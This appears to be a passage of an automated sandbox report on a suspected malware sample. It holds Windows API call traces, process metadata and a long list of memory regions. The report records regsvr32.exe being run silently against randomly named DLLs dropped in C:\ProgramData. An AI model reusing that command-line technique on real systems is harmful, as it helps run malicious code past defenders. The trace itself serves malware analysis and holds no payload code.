[0083.236] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.236] Sleep (dwMilliseconds=0x64)
[0083.344] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.344] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.344] Sleep (dwMilliseconds=0x64)
[0083.454] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.454] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.454] Sleep (dwMilliseconds=0x64)
[0083.563] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.563] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.563] Sleep (dwMilliseconds=0x64)
[0083.672] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.672] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.672] Sleep (dwMilliseconds=0x64)
[0083.781] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.781] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5faf
[0083.781] Sleep (dwMilliseconds=0x64)
[0083.890] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0083.890] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0083.891] _vsnwprintf (in: _Buffer=0x16fa64, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x16f7d8 | out: _Buffer="\x081") returned 2
[0083.891] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0083.891] __iob_func () returned 0x757a2900
[0083.891] _fileno (_File=0x757a2920) returned 1
[0083.891] _errno () returned 0x3f07d8
[0083.891] _get_osfhandle (_FileHandle=1) returned 0x4c
[0083.891] _errno () returned 0x3f07d8
[0083.891] GetFileType (hFile=0x4c) returned 0x2
[0083.891] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0083.891] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0083.891] lstrlenW (lpString="\x081") returned 2
[0083.891] GetConsoleOutputCP () returned 0x1b5
[0083.891] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x081", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0083.891] GetConsoleOutputCP () returned 0x1b5
[0083.891] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x081", cchWideChar=2, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x081", lpUsedDefaultChar=0x0) returned 2
[0083.891] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 2
[0083.892] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0083.892] Sleep (dwMilliseconds=0x64)
[0084.002] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.002] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.002] Sleep (dwMilliseconds=0x64)
[0084.109] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.109] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.109] Sleep (dwMilliseconds=0x64)
[0084.219] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.219] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.219] Sleep (dwMilliseconds=0x64)
[0084.327] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.327] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.327] Sleep (dwMilliseconds=0x64)
[0084.436] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.436] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.436] Sleep (dwMilliseconds=0x64)
[0084.545] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.546] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.546] Sleep (dwMilliseconds=0x64)
[0084.654] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.655] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.655] Sleep (dwMilliseconds=0x64)
[0084.764] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.764] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb0
[0084.764] Sleep (dwMilliseconds=0x64)
[0084.873] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x16f808, nLength=0x2, lpNumberOfEventsRead=0x16f84c | out: lpBuffer=0x16f808, lpNumberOfEventsRead=0x16f84c) returned 1
[0084.873] time (in: timer=0x16f864 | out: timer=0x16f864) returned 0x5bcd5fb1
[0084.873] _vsnwprintf (in: _Buffer=0x16fa64, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x16f7d8 | out: _Buffer="\x080") returned 2
[0084.873] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0084.873] __iob_func () returned 0x757a2900
[0084.873] _fileno (_File=0x757a2920) returned 1
[0084.873] _errno () returned 0x3f07d8
[0084.874] _get_osfhandle (_FileHandle=1) returned 0x4c
[0084.874] _errno () returned 0x3f07d8
[0084.874] GetFileType (hFile=0x4c) returned 0x2
[0084.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0084.874] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0084.874] lstrlenW (lpString="\x080") returned 2
[0084.874] GetConsoleOutputCP () returned 0x1b5
[0084.874] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x080", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2
[0084.874] GetConsoleOutputCP () returned 0x1b5
[0084.874] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x080", cchWideChar=2, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x080", lpUsedDefaultChar=0x0) returned 2
[0084.874] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 2
[0084.874] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0084.874] Sleep (dwMilliseconds=0x64)
[0084.982] __iob_func () returned 0x757a2900
[0084.982] _fileno (_File=0x757a2920) returned 1
[0084.982] _errno () returned 0x3f07d8
[0084.982] _get_osfhandle (_FileHandle=1) returned 0x4c
[0084.982] _errno () returned 0x3f07d8
[0084.982] GetFileType (hFile=0x4c) returned 0x2
[0084.982] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0084.983] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x16f7a4 | out: lpMode=0x16f7a4) returned 0
[0084.983] lstrlenW (lpString="\n") returned 1
[0084.983] GetConsoleOutputCP () returned 0x1b5
[0084.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1
[0084.983] GetConsoleOutputCP () returned 0x1b5
[0084.983] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x27040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1
[0084.983] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 1
[0084.983] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0084.990] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1
[0084.991] exit (_Code=0)
Process:
id = "24"
image_name = "regsvr32.exe"
filename = "c:\\windows\\system32\\regsvr32.exe"
page_root = "0x7f1be640"
os_pid = "0xf0c"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2206
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2207
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2208
start_va = 0x40000
end_va = 0x41fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2209
start_va = 0xb0000
end_va = 0xeffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000b0000"
filename = ""
Region:
id = 2210
start_va = 0xa40000
end_va = 0xa46fff
entry_point = 0xa40000
region_type = mapped_file
name = "regsvr32.exe"
filename = "\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")
Region:
id = 2211
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2212
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2213
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2214
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 2215
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2216
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2217
start_va = 0xf0000
end_va = 0x156fff
entry_point = 0xf0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2218
start_va = 0x1e0000
end_va = 0x2dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 2219
start_va = 0x400000
end_va = 0x40ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 2220
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 2221
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2222
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2223
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2224
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2225
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2226
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2227
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2228
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2229
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2230
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2231
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2232
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2233
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2234
start_va = 0x2e0000
end_va = 0x3a7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 2235
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2236
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2302
start_va = 0x20000
end_va = 0x26fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2303
start_va = 0x50000
end_va = 0x51fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 2304
start_va = 0x60000
end_va = 0x61fff
entry_point = 0x60000
region_type = mapped_file
name = "regsvr32.exe.mui"
filename = "\\Windows\\System32\\en-US\\regsvr32.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\regsvr32.exe.mui")
Region:
id = 2305
start_va = 0x70000
end_va = 0x70fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 2306
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 2307
start_va = 0xa0000
end_va = 0xa1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000a0000"
filename = ""
Region:
id = 2308
start_va = 0x410000
end_va = 0x510fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000410000"
filename = ""
Region:
id = 2309
start_va = 0xa50000
end_va = 0x164ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a50000"
filename = ""
Region:
id = 2310
start_va = 0x160000
end_va = 0x1bbfff
entry_point = 0x160000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2311
start_va = 0x160000
end_va = 0x1bbfff
entry_point = 0x160000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2312
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2313
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2314
start_va = 0x520000
end_va = 0x68ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000520000"
filename = ""
Region:
id = 2315
start_va = 0x520000
end_va = 0x5fefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 2316
start_va = 0x650000
end_va = 0x68ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000650000"
filename = ""
Region:
id = 2317
start_va = 0x690000
end_va = 0x7a7fff
entry_point = 0x690000
region_type = mapped_file
name = "marxvxinhhm64528113361.dll"
filename = "\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll" (normalized: "c:\\programdata\\xxx6000137xx\\marxvxinhhm64528113361.dll")
Region:
id = 2318
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2319
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2320
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2321
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2322
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2323
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2324
start_va = 0x90000
end_va = 0x91fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 2325
start_va = 0x7b0000
end_va = 0x899fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007b0000"
filename = ""
Region:
id = 2357
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2358
start_va = 0x160000
end_va = 0x164fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2359
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2360
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2361
start_va = 0x160000
end_va = 0x176fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2364
start_va = 0x7b0000
end_va = 0x8effff
entry_point = 0x0
region_type = private
name = "private_0x00000000007b0000"
filename = ""
Region:
id = 2365
start_va = 0x8f0000
end_va = 0xa08fff
entry_point = 0x8f0000
region_type = mapped_file
name = "marxvxinhhm98.dll"
filename = "\\ProgramData\\tempa\\marxvxinhhm98.dll" (normalized: "c:\\programdata\\tempa\\marxvxinhhm98.dll")
Region:
id = 2366
start_va = 0x90000
end_va = 0x91fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 2367
start_va = 0x1650000
end_va = 0x173afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001650000"
filename = ""
Region:
id = 2413
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2414
start_va = 0x160000
end_va = 0x164fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2415
start_va = 0x160000
end_va = 0x161fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2416
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2417
start_va = 0x160000
end_va = 0x176fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2420
start_va = 0x1650000
end_va = 0x178ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001650000"
filename = ""
Region:
id = 2421
start_va = 0x7ff50000
end_va = 0x7ffaffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ff50000"
filename = ""
Region:
id = 2422
start_va = 0x160000
end_va = 0x1befff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 2424
start_va = 0x1790000
end_va = 0x188ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001790000"
filename = ""
Region:
id = 2427
start_va = 0x90000
end_va = 0x90fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 2428
start_va = 0x1890000
end_va = 0x190ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001890000"
filename = ""
Region:
id = 2429
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2801
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 2816
start_va = 0x1910000
end_va = 0x1a0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001910000"
filename = ""
Region:
id = 3144
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 3504
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 3517
start_va = 0x1a10000
end_va = 0x1b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001a10000"
filename = ""
Region:
id = 3940
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 4286
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 4565
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 4577
start_va = 0x1b10000
end_va = 0x1c0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b10000"
filename = ""
Region:
id = 4806
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 5159
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 5171
start_va = 0x1c10000
end_va = 0x1d0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001c10000"
filename = ""
Region:
id = 5508
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 5858
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 6495
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 6509
start_va = 0x1d10000
end_va = 0x1e0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 6841
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 7181
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 7195
start_va = 0x1e10000
end_va = 0x1f0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001e10000"
filename = ""
Region:
id = 7537
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 7885
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 8221
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 8235
start_va = 0x1f10000
end_va = 0x200ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001f10000"
filename = ""
Region:
id = 8571
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Thread:
id = 217
os_tid = 0xf10
[0085.328] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xef914 | out: lpSystemTimeAsFileTime=0xef914*(dwLowDateTime=0xe35c7250, dwHighDateTime=0x1d469c7))
[0085.328] GetCurrentProcessId () returned 0xf0c
[0085.328] GetCurrentThreadId () returned 0xf10
[0085.328] GetTickCount () returned 0x23207
[0085.328] QueryPerformanceCounter (in: lpPerformanceCount=0xef90c | out: lpPerformanceCount=0xef90c*=1815927300000) returned 1
